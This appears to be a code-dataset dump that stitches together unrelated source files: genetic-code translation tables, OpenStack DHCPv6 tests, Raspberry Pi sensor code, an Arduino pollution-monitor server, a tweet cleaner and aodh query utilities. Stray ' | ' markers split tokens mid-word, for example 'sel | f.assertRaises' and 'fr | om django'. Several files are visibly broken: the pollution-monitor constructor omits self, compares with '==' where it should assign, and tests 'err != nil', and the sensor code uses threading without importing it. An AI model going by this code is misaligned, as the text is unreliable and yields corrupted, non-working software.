- **13** Ascidian Mitochondrial Code
- **14** Alternative Flatworm Mitochondrial Code
- **21** Trematode Mitochondrial Code
- **24** Pterobranchia mito
If more transl_tables are needed, you should be able to just drop
them in, with a little tweaking.
This provides
- **code** A dictionary. So you can ask for eg myGC.code['ggg']
- **codonsForAA** Another dictionary, where you can ask for eg myGC.codonsForAA['v']
- **startList** A list of start codons
**Methods**
.. autosummary::
GeneticCode.translate
GeneticCode.wise2Table
Wikipedia says: The joint nomenclature committee of the
IUPAC/IUBMB has officially recommended the three-letter symbol Sec
and the one-letter symbol U for selenocysteine. The UGA codon is
made to encode selenocysteine by the presence of a SECIS element
(SElenoCysteine Insertion Sequence) in the mRNA.
"""
def __init__(self, transl_table=1):
self.transl_table = transl_table
self.code = {}
self.codonsForAA = {}
self.startList = []
if transl_table == 1: # standard
AAs = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '---M---------------M---------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 2: # vertebrate mito
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIMMTTTTNNKKSS**VVVVAAAADDEEGGGG'
Starts = '--------------------------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# 3. The Yeast Mitochondrial Code (transl_table=3)
elif transl_table == 3:
AAs = 'FFLLSSSSYY**CCWWTTTTPPPPHHQQRRRRIIMMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '----------------------------------MM----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 4: # Mold, Protozoan,
# and Coelenterate Mitochondrial Code and the
# Mycoplasma/Spiroplasma Code
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '--MM---------------M------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 5: # invertebrate mito
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIMMTTTTNNKKSSSSVVVVAAAADDEEGGGG'
Starts = '---M----------------------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Ciliate, Dasycladacean and Hexamita Nuclear Code (transl_table=6)
elif transl_table == 6:
AAs = 'FFLLSSSSYYQQ | CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
| Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# tables 7 and 8 have been deleted from NCBI.
elif transl_table == 9: # echinoderm and flatworm mito
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIIMTTTTNNNKSSSSVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
elif transl_table == 10: # The Euplotid Nuclear Code (transl_table=10)
AAs = 'FFLLSSSSYY**CCCWLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Bacterial and Plant Plastid Code (transl_table=11)
elif transl_table == 11:
AAs = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '---M---------------M------------MMMM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Alternative Yeast Nuclear Code (transl_table=12)
elif transl_table == 12:
AAs = 'FFLLSSSSYY**CC*WLLLSPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'
Starts = '-------------------M---------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Ascidian Mitochondrial Code (transl_table=13)
elif transl_table == 13:
AAs = 'FFLLSSSSYY**CCWWLLLLPPPPHHQQRRRRIIMMTTTTNNKKSSGGVVVVAAAADDEEGGGG'
Starts = '---M------------------------------MM---------------M------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# The Alternative Flatworm Mitochondrial Code (transl_table=14)
elif transl_table == 14:
AAs = 'FFLLSSSSYYY*CCWWLLLLPPPPHHQQRRRRIIIMTTTTNNNKSSSSVVVVAAAADDEEGGGG'
Starts = '-----------------------------------M----------------------------'
Base1 = 'TTTTTTTTTTTTTTTTCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAGGGGGGGGGGGGGGGG'
Base2 = 'TTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGGTTTTCCCCAAAAGGGG'
Base3 = 'TCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAGTCAG'
# Trematode Mitochondrial Code (transl_table=2 |
nuagenetworks/tempest | tempest/api/network/test_dhcp_ipv6.py | Python | apache-2.0 | 18,551 | 0.000054 | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import random
import six
from tempest.api.network import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class NetworksTestDHCPv6(base.BaseNetworkTest):
_ip_version = 6
""" Test DHCPv6 specific features using SLAAC, stateless and
stateful settings for subnets. Also it shall check dual-stack
functionality (IPv4 + IPv6 together).
The tests include:
generating of SLAAC EUI-64 address in subnets with various settings
receiving SLAAC addresses in combinations of various subnets
receiving stateful IPv6 addresses
addressing in subnets with router
"""
    @classmethod
    def skip_checks(cls):
        """Skip the whole class unless the deployment enables IPv6 and
        the DHCPv6 subnet attributes extension."""
        super(NetworksTestDHCPv6, cls).skip_checks()
        msg = None
        if not CONF.network_feature_enabled.ipv6:
            msg = "IPv6 is not enabled"
        elif not CONF.network_feature_enabled.ipv6_subnet_attributes:
            msg = "DHCPv6 attributes are not enabled."
        if msg:
            raise cls.skipException(msg)
    @classmethod
    def resource_setup(cls):
        """Create the single network shared by all tests in this class."""
        super(NetworksTestDHCPv6, cls).resource_setup()
        cls.network = cls.create_network()
def _remove_from_list_by_index(self, things_list, elem):
for index, i in enumerate(things_list):
if i['id'] == elem['id']:
break
del things_list[index]
    def _clean_network(self):
        """Tear down ports, subnets and routers created by a test case.

        Router-interface ports are detached via the router API; all other
        tracked ports, then subnets, then routers are deleted, and the
        class-level tracking lists are pruned accordingly.
        """
        body = self.ports_client.list_ports()
        ports = body['ports']
        for port in ports:
            # Router-interface ports cannot be deleted directly; detach
            # them from their (tracked) router instead.
            if (port['device_owner'].startswith('network:router_interface') and
                    port['device_id'] in [r['id'] for r in self.routers]):
                self.routers_client.remove_router_interface(port['device_id'],
                                                            port_id=port['id'])
            else:
                if port['id'] in [p['id'] for p in self.ports]:
                    self.ports_client.delete_port(port['id'])
                    self._remove_from_list_by_index(self.ports, port)
        body = self.subnets_client.list_subnets()
        subnets = body['subnets']
        for subnet in subnets:
            if subnet['id'] in [s['id'] for s in self.subnets]:
                self.subnets_client.delete_subnet(subnet['id'])
                self._remove_from_list_by_index(self.subnets, subnet)
        body = self.routers_client.list_routers()
        routers = body['routers']
        for router in routers:
            if router['id'] in [r['id'] for r in self.routers]:
                self.routers_client.delete_router(router['id'])
                self._remove_from_list_by_index(self.routers, router)
    def _get_ips_from_subnet(self, **kwargs):
        """Create a subnet + port and return (real_ip, eui_ip).

        real_ip is the first fixed IP actually assigned to the port;
        eui_ip is the SLAAC EUI-64 address computed from the subnet CIDR
        and the port's (random) MAC, for comparison in the tests.
        """
        subnet = self.create_subnet(self.network, **kwargs)
        port_mac = data_utils.rand_mac_address()
        port = self.create_port(self.network, mac_address=port_mac)
        real_ip = next(iter(port['fixed_ips']), None)['ip_address']
        eui_ip = data_utils.get_ipv6_addr_by_EUI64(subnet['cidr'],
                                                   port_mac).format()
        return real_ip, eui_ip
    @test.idempotent_id('e5517e62-6f16-430d-a672-f80875493d4c')
    def test_dhcpv6_stateless_eui64(self):
        # NOTE: When subnets configured with RAs SLAAC (AOM=100) and DHCP
        # stateless (AOM=110) both for radvd and dnsmasq, port shall receive
        # IP address calculated from its MAC.
        for ra_mode, add_mode in (
                ('slaac', 'slaac'),
                ('dhcpv6-stateless', 'dhcpv6-stateless'),
        ):
            kwargs = {'ipv6_ra_mode': ra_mode,
                      'ipv6_address_mode': add_mode}
            real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
            # Clean up before asserting so a failure doesn't leak resources.
            self._clean_network()
            self.assertEqual(eui_ip, real_ip,
                             ('Real port IP is %s, but shall be %s when '
                              'ipv6_ra_mode=%s and ipv6_address_mode=%s') % (
                                 real_ip, eui_ip, ra_mode, add_mode))
    @test.idempotent_id('ae2f4a5d-03ff-4c42-a3b0-ce2fcb7ea832')
    def test_dhcpv6_stateless_no_ra(self):
        # NOTE: When subnets configured with dnsmasq SLAAC and DHCP stateless
        # and there is no radvd, port shall receive IP address calculated
        # from its MAC and mask of subnet.
        for ra_mode, add_mode in (
                (None, 'slaac'),
                (None, 'dhcpv6-stateless'),
        ):
            kwargs = {'ipv6_ra_mode': ra_mode,
                      'ipv6_address_mode': add_mode}
            # Drop None-valued keys so ipv6_ra_mode is simply omitted.
            kwargs = dict((k, v) for k, v in six.iteritems(kwargs) if v)
            real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
            self._clean_network()
            self.assertEqual(eui_ip, real_ip,
                             ('Real port IP %s shall be equal to EUI-64 %s'
                              'when ipv6_ra_mode=%s,ipv6_address_mode=%s') % (
                                 real_ip, eui_ip,
                                 ra_mode if ra_mode else "Off",
                                 add_mode if add_mode else "Off"))
@test.idempotent_id('81f18ef6-95b5-4584-9966-10d480b7496a')
def test_dhcpv6_invalid_options(self):
"""Different configurations for radvd and dnsmasq are not allowed"""
for ra_mode, add_mode in (
('dhcpv6-stateless', 'dhcpv6-s | tateful'),
('dhcpv6-stateless', 'slaac'),
('slaac', 'dhcpv6-stateful'),
('dhcpv6-stateful', 'dhcpv6-stateless'),
('dhcpv6-stateful', 'slaac'),
('slaac', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
sel | f.assertRaises(lib_exc.BadRequest,
self.create_subnet,
self.network,
**kwargs)
    @test.idempotent_id('21635b6f-165a-4d42-bf49-7d195e47342f')
    def test_dhcpv6_stateless_no_ra_no_dhcp(self):
        # NOTE: If no radvd option and no dnsmasq option is configured
        # port shall receive IP from fixed IPs list of subnet.
        real_ip, eui_ip = self._get_ips_from_subnet()
        self._clean_network()
        # Without SLAAC/DHCPv6 the EUI-64-derived address must NOT appear.
        self.assertNotEqual(eui_ip, real_ip,
                            ('Real port IP %s equal to EUI-64 %s when '
                             'ipv6_ra_mode=Off and ipv6_address_mode=Off,'
                             'but shall be taken from fixed IPs') % (
                                real_ip, eui_ip))
@test.idempotent_id('4544adf7-bb5f-4bdc-b769-b3e77026cef2')
def test_dhcpv6_two_subnets(self):
# NOTE: When one IPv6 subnet configured with dnsmasq SLAAC or DHCP
# stateless and other IPv6 is with DHCP stateful, port shall receive
# EUI-64 IP addresses from first subnet and DHCP address from second
# one. Order of subnet creating should be unimportant.
for order in ("slaac_first", "dhcp_first"):
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
kwargs_dhcp = {'ipv6_address_mode': 'dhcpv6-stateful'}
if order == "slaac_first":
subnet_slaac = self |
wodiesan/senior_design_spring | night_sensor/night_feature.py | Python | mit | 1,274 | 0.00157 | """
@author: Sze "Ron" Chau
@e-mail: chaus3@wit.edu
@source: https://github.com/wodiesan/sweet-skoomabot
@desc Night sensor-->RPi for Senior Design 1
"""
import logging
import os
import RPi.GPIO as GPIO
import serial
import subprocess
import sys
import time
import traceback
# GPIO pins for the four IR LEDs. Uses the BCM numbering system based on
# the RPi B+ board.
IR1 = 26
IR2 = 19
IR3 = 13
IR4 = 6
def init_serial():
    """Initialize the serial connection to the light sensor."""
    ser = serial.Serial()
    #ser.port = "\\.\COM4" # Windows
    ser.port = "/dev/ttyUSB0" # Linux
    ser.baudrate = 57600
    try:
        ser.open()
    # Python 2 except syntax -- this module is written for Python 2.
    except Exception, e:
        # NOTE(review): 'logger' is not defined in the code visible here
        # (only 'import logging') -- confirm it is created elsewhere.
        logger.info("Possible open serial port: " + str(e))
        print 'Check the serial USB port.'
        exit()
    return ser
def init_leds():
    """Initial setup for light sensor and IR LEDs. Currently uses the BCM
    numbering system based on RPi B+ board."""
    GPIO.setmode(GPIO.BCM)
    # Drive all four IR LEDs high (on) at startup.
    GPIO.setup(IR1, GPIO.OUT, initial=GPIO.HIGH)
    GPIO.setup(IR2, GPIO.OUT, initial=GPIO.HIGH)
    GPIO.setup(IR3, GPIO.OUT, initial=GPIO.HIGH)
    GPIO.setup(IR4, GPIO.OUT, initial=GPIO.HIGH)
    # NOTE(review): 'threading' is never imported in this module and no
    # 'warnings' callable is defined here -- this line will NameError as
    # written; confirm the missing import/function.
    thread = threading.Thread(target=warnings)
    thread.daemon = False
    thread.start()
    return thread
|
SEL-Columbia/commcare-hq | corehq/apps/accounting/tests/base_tests.py | Python | bsd-3-clause | 191 | 0 | fr | om django.test import TestCase
from corehq.apps.accounting import generator
class BaseAccountingTest(TestCase):
def setUp(self):
generator.instantiate_accounting_for_tests() | |
yorkhackspace/pollution_graph | test_server.py | Python | gpl-3.0 | 3,182 | 0.002828 | #!/usr/bin/env python3
"""
Python half of the pollution monitor.
This bit is the brains, such that they are. The arduino
will be pretty dumb just driving the lights and display
and also reading the rotary encoders.
Arduino sends
Lnn - Where nn is a number from 00 to 99 for locations.
Tnn - Where nn is a number for the hours.
Python sends
Vnn - Where nn is a number from 00 to 25 for | the LED value
"""
from test_data import *
import serial
import logging
class Arduino():
    """Thin wrapper around the serial link to the Arduino.

    Reads "Tnn"/"Lnn" lines from the board and answers with gas-level
    updates (see the module docstring for the protocol).
    """

    def __init__(self, port, data_values=None):
        # Fixed: the original omitted 'self', compared (==) instead of
        # assigning the port, and required data_values even though
        # run_server never passes one.
        self.port = port
        self.data_values = data_values
        self.arduino = open_arduino(port)
        self.currentTime = 8
        self.currentLocation = 1

    def write(self, message):
        """Write a command string to the Arduino; return None (no error)."""
        err = None
        logging.debug("Sending {}".format(message))
        # pyserial has no writeline(); write the raw message instead
        # (the original's b() helper was never defined).
        self.arduino.write(message)
        return err

    def arduino_read(self):
        """Read one line from the board and dispatch on its prefix."""
        msg = self.arduino.readline()
        if msg.startswith("T"):
            self.process_time(msg)
        elif msg.startswith("L"):
            # NOTE(review): process_location is not defined anywhere in this
            # file -- confirm it is still to be written.
            self.process_location(msg)
        else:
            logging.error("Unknown message: {}".format(msg))

    def process_time(self, msg):
        """Handle a "Tnn" (hour-of-day) message from the board."""
        global current_location
        value, err = split_message(msg)
        # split_message signals success with err falsy; the original tested
        # "err != nil", which was a NameError.
        if not err and value is not None and 0 <= value < 24:
            logging.debug("Received time: {}".format(value))
            # NOTE(review): the dict built in __main__ uses the key 'hour',
            # not 'time' -- confirm which key is intended.
            current_location["time"] = value
            new_gas_level = get_gas_value()
            # NOTE(review): module docstring says values go out as "Vnn",
            # but the original sent "L{}" -- kept as-is; confirm.
            self.write("L{}".format(new_gas_level))
        else:
            logging.error("Received bad time message:'{}'".format(msg))
def open_arduino(port):
    """Open the serial port to the Arduino and wait for its boot banner.

    There should probably be more error checking here (original TODO).
    """
    arduino = serial.Serial(port, 57600)
    # Opening the port resets most Arduinos; the first line they print
    # tells us the sketch is alive before we start talking to it.
    # (Fixed typo: the original read from the undefined name 'audiono'.)
    firstline = arduino.readline()
    logging.debug("Arduino Starting... {} ".format(firstline))
    return arduino
def split_message(msg):
    """Split a board message like 'T08' into (value, err).

    The protocol payload is the integer after the leading letter ("Lnn" /
    "Tnn"). Returns (int, False) on success and (None, True) when the
    payload is not an integer. Fixes the original, which read only the
    first digit (msg[1:2]) and could never signal an error.
    """
    err = False
    try:
        value = int(msg[1:].strip())
    except ValueError:
        value = None
        err = True
    return value, err
def get_gas_value():
    """Return the gas value at the current location
    For now we are just doing NO2"""
    global source_data
    global current_location
    global locations
    # NOTE(review): 'gas' is assigned (NO2 presumably comes from the star
    # import of test_data) but never used -- the filter below hard-codes
    # the string 'NO2'. Confirm which is intended.
    gas = NO2
    location_data = [ x for x in source_data if x['location'] == locations[current_location["location"]] ]
    location_data_for_gas = [(x['date'], x['value']) for x in location_data if x['gas'] == 'NO2']
    # TODO need to actually work here. Just fudge it for now
    return location_data_for_gas[0][1]
def run_server():
    """The main thread that runs the server"""
    # NOTE(review): several mismatches with the rest of this file:
    # - the port string ends in a capital letter 'O' ('ttyUSBO'), while
    #   init_serial uses '/dev/ttyUSB0' (zero) -- almost certainly a typo;
    # - Arduino has no set_temperature() method, and its read method is
    #   named arduino_read(self) (called here as read(arduino)).
    arduino = Arduino(port = '/dev/ttyUSBO')
    arduino.set_temperature()
    while True:
        arduino.read(arduino)
# This is going to be global, so things
# can read from it when required.
source_data = extract_csv_to_list('input.csv')
current_location = {
'hour': 8,
'location': 1,
}
# Get this from the data above.
locations = ['Bootham Row', 'Gillygate']
run_server()
|
luozhaoyu/big-data-system | assignment3/partB/parsetweet.py | Python | mit | 2,168 | 0.006919 | #!/usr/bin/env python
import os,sys
import string
import re
import pickle
stopword_file = './stopwords'
class CleanTweet(object):
    """
    case-sensitive, removed url, hashtag#, special term like 'RT', and reply@
    """
    # Patterns stripped from the raw text before tokenizing: URLs,
    # @mentions (twitter ids are 1-15 word chars), leading 'RT', and any
    # non-ASCII byte runs. (This module is Python 2.)
    _url = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
    _tweeterid = r'@\w{1,15}'
    _retweet = r'^RT'
    _nonascii = r'[^\x00-\x7F]+'
    filter_re = [_url, _tweeterid, _retweet, _nonascii]
    def __init__(self, rawtweet, stopwords=[]):
        # NOTE(review): mutable default for 'stopwords' -- harmless here
        # because it is never mutated, but worth confirming.
        self._tweet = rawtweet
        cleantweet = rawtweet
        for ptn in self.filter_re:
            cleantweet = re.sub(ptn, '', cleantweet)
        punct = string.punctuation#.replace("'","")
        # Python 2 str.translate: delete every punctuation character.
        cleantweet = cleantweet.translate(None, punct)
        self._toks = cleantweet.lower().replace('\xe2','').split()
        self._toks = [item.strip() for item in self._toks if item not in stopwords]
        for w in self._toks:
            if '\xe2' in w:
                print w
        self._cleantweet = ' '.join(self._toks)
    def rawtweet(self):
        """Return the original, unmodified tweet text."""
        return self._tweet
    def cleantweet(self):
        """Return the cleaned, space-joined token string."""
        return self._cleantweet
    def toks(self):
        """Return the list of cleaned tokens."""
        return self._toks
    def __str__(self):
        return self._cleantweet
infilename = sys.a | rgv[1]
outfilename = sys.argv[2]
tweets = []
stopwords = []
with open(stopword_file, 'rb') as fs:
for word in fs:
stopwords.append(word.strip())
fs.close()
with open(infilename, 'rb') as fi, open(outfilename, 'wb') as fo:
infile = fi.read() |
start = '['
stop = ']'
buf = ''
flag = False
for c in infile:
if c == start:
flag = True
continue
elif c == stop:
tweetobj = CleanTweet(buf, stopwords).cleantweet()
if tweetobj != '':
tweets.append(tweetobj)
buf = ''
flag = False
if flag:
buf += c
if len(tweets) >= 1000000:
break
pickle.dump(tweets, fo)
fi.close()
fo.close()
with open(outfilename, 'rb') as fo:
newlist = pickle.load(fo)
for t in newlist:
print t
|
chungg/python-aodhclient | aodhclient/utils.py | Python | apache-2.0 | 4,174 | 0.00024 | # -*- encoding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pyparsing as pp

# Grammar for the aodh "--query" filter language. The public names below
# are imported elsewhere, so they keep their original (sometimes
# misspelled, e.g. 'uninary') identifiers.
uninary_operators = ("not", )
# NOTE: the original tuple ended with the adjacent literals u"like" "in",
# which implicitly concatenated into a junk u"likein" entry; both
# operators already appear earlier in the tuple, so the junk is dropped.
binary_operator = (u">=", u"<=", u"!=", u">", u"<", u"=", u"==", u"eq", u"ne",
                   u"lt", u"gt", u"ge", u"le", u"in", u"like", u"≠", u"≥",
                   u"≤")
multiple_operators = (u"and", u"or", u"∧", u"∨")

operator = pp.Regex(u"|".join(binary_operator))
null = pp.Regex("None|none|null").setParseAction(pp.replaceWith(None))
boolean = "False|True|false|true"
boolean = pp.Regex(boolean).setParseAction(lambda t: t[0].lower() == "true")
# Repaired a token garbled in the source: pp.Word(pp.hexnums, exact=n).
hex_string = lambda n: pp.Word(pp.hexnums, exact=n)
uuid = pp.Combine(hex_string(8) + ("-" + hex_string(4)) * 3 +
                  "-" + hex_string(12))
# Fixed the original's (:? ...) typo -- the groups are meant to be
# non-capturing (?: ...), not to match an optional leading colon.
number = r"[+-]?\d+(?:\.\d*)?(?:[eE][+-]?\d+)?"
number = pp.Regex(number).setParseAction(lambda t: float(t[0]))
identifier = pp.Word(pp.alphas, pp.alphanums + "_")
quoted_string = pp.QuotedString('"') | pp.QuotedString("'")
comparison_term = pp.Forward()
in_list = pp.Group(pp.Suppress('[') +
                   pp.Optional(pp.delimitedList(comparison_term)) +
                   pp.Suppress(']'))("list")
comparison_term << (null | boolean | uuid | identifier | number |
                    quoted_string | in_list)
condition = pp.Group(comparison_term + operator + comparison_term)
expr = pp.operatorPrecedence(condition, [
    ("not", 1, pp.opAssoc.RIGHT, ),
    ("and", 2, pp.opAssoc.LEFT, ),
    ("∧", 2, pp.opAssoc.LEFT, ),
    ("or", 2, pp.opAssoc.LEFT, ),
    ("∨", 2, pp.opAssoc.LEFT, ),
])
def _parsed_query2dict(parsed_query):
    """Fold a pyparsing result (from ``expr``) into nested plain dicts.

    Tokens are consumed from the END of the result backwards, so the
    accumulator built so far always becomes the right-hand operand.
    """
    result = None
    while parsed_query:
        part = parsed_query.pop()
        if part in binary_operator:
            # e.g. ['x', '>=', 3] -> {'>=': {'x': 3}}
            result = {part: {parsed_query.pop(): result}}
        elif part in multiple_operators:
            # Chain consecutive and/or terms into one operand list.
            if result.get(part):
                result[part].append(
                    _parsed_query2dict(parsed_query.pop()))
            else:
                result = {part: [result]}
        elif part in uninary_operators:
            result = {part: result}
        elif isinstance(part, pp.ParseResults):
            kind = part.getName()
            if kind == "list":
                # Bracketed value lists become plain Python lists.
                res = part.asList()
            else:
                res = _parsed_query2dict(part)
            if result is None:
                result = res
            elif isinstance(result, dict):
                list(result.values())[0].append(res)
        else:
            # Plain token (identifier, number, string, bool, None).
            result = part
    return result
def search_query_builder(query):
    """Parse a filter-expression string into its nested dict form."""
    root_node = expr.parseString(query)[0]
    return _parsed_query2dict(root_node)
def list2cols(cols, objs):
    """Project each mapping in *objs* onto *cols*; return (cols, rows)."""
    rows = []
    for obj in objs:
        rows.append(tuple(obj[name] for name in cols))
    return cols, rows
def format_string_list(objs, field):
    """In place: collapse the list at objs[field] into 'a, b, c' form."""
    joined = ", ".join(objs[field])
    objs[field] = joined
def format_dict_list(objs, field):
    """In place: render objs[field] (a list of dicts) as '- k: v' lines."""
    bullets = []
    for elem in objs[field]:
        pairs = ", ".join("%s: %s" % (k, v) for k, v in elem.items())
        bullets.append("- " + pairs)
    objs[field] = "\n".join(bullets)
def format_move_dict_to_root(obj, field):
    """In place: hoist obj[field]'s entries to 'field/key' and drop field."""
    nested = obj[field]
    for key in nested:
        obj["%s/%s" % (field, key)] = nested[key]
    del obj[field]
def format_archive_policy(ap):
    """In place: render an archive-policy dict's list fields for display."""
    format_dict_list(ap, "definition")
    format_string_list(ap, "aggregation_methods")
def dict_from_parsed_args(parsed_args, attrs):
    """Collect the non-None attributes named in *attrs* into a dict."""
    collected = {}
    for name in attrs:
        candidate = getattr(parsed_args, name)
        if candidate is None:
            continue
        collected[name] = candidate
    return collected
def dict_to_querystring(objs):
    """Render non-None items of *objs* as an unescaped 'k=v&k=v' string."""
    parts = []
    for key, value in objs.items():
        if value is None:
            continue
        parts.append("%s=%s" % (key, value))
    return "&".join(parts)
|
rahulunair/nova | nova/tests/unit/policies/test_admin_actions.py | Python | apache-2.0 | 5,313 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova.api.openstack.compute import admin_actions
